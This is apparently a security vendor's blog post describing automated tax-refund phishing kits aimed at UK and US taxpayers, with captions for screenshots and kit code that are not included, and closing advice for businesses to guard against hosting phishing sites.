Imperva’s Application Defense Center (ADC) have discovered a new type of online tax scheme. Online schemes to steal money using tax rebates as a lure have been around for some time, and well documented. However, past attempts have often been manual, tedious efforts. Today’s initiatives feature much more sophisticated, automated tactics. We believe the past success of “getting a bigger refund, earlier” has helped inspire a new set of tools and approaches to defraud consumers.

The current crop of scams affect the UK and the US (there could be more, but our language skills are limited.) For context, Americans file taxes between January 1st and April 15thand rebates are given during this period. The UK’s tax deadline was January 31st and the window for rebates is currently in place.

How Does The Scheme Work?
Although hacker groups operate with intentions to defraud consumers, it is interesting to describe their attempts from the perspective of both the victim and the hacker.
1. The victim’s perspective — Traditional phishing attempts with a tax-centric theme.

First, the phishing email:

Second, the forged site:

2. The hacker’s perspective — As we’ve seen with Gmail, Yahoo!, and other common phishing schemes automation was used to reduce the time and cost involved with setup, deployment, and monitoring.

First, the hacker’s code designating a Gmail drop box for stolen credentials:

Second, the code where the hacker designates a false email alias:

Third, the spoofed website:

Fourth, an illustration of the downloadable kits that help hackers set up their schemes:

Fifth, a list of banks the hacker kits provide for spoofing:

Sixth, another example of fake refund portals:

Seventh, a hacker kit to spoof the IRS:

Eighth, a screenshot showing links to spoofed banks set up by the hacker kits.

Avoiding the Schemes
There are two problems associated with this phishing campaign:
1. The target of the phishing scheme, consumers.
2. The unwitting hosts of the phishing scheme, businesses.

Given the persistence and frequency of phishing, especially the resurgence of current tax schemes, we are less hopeful that a consumer-centric solution will have a sufficient impact. Like it or not, this means businesses will have to bear the burden. Considering the real business impact, enterprises need to know if they are hosting a phishing site. Here is an example of Google labels businesses suspected of hosting a phishing site—a virtual kiss of death:

This current phishing campaign underscores the need for businesses to adopt an effective data and application security approach. To avoid becoming a hosting place for a phishing site, business websites must protect their application from attacks such as cross-site scripting (XSS) and SQL injection.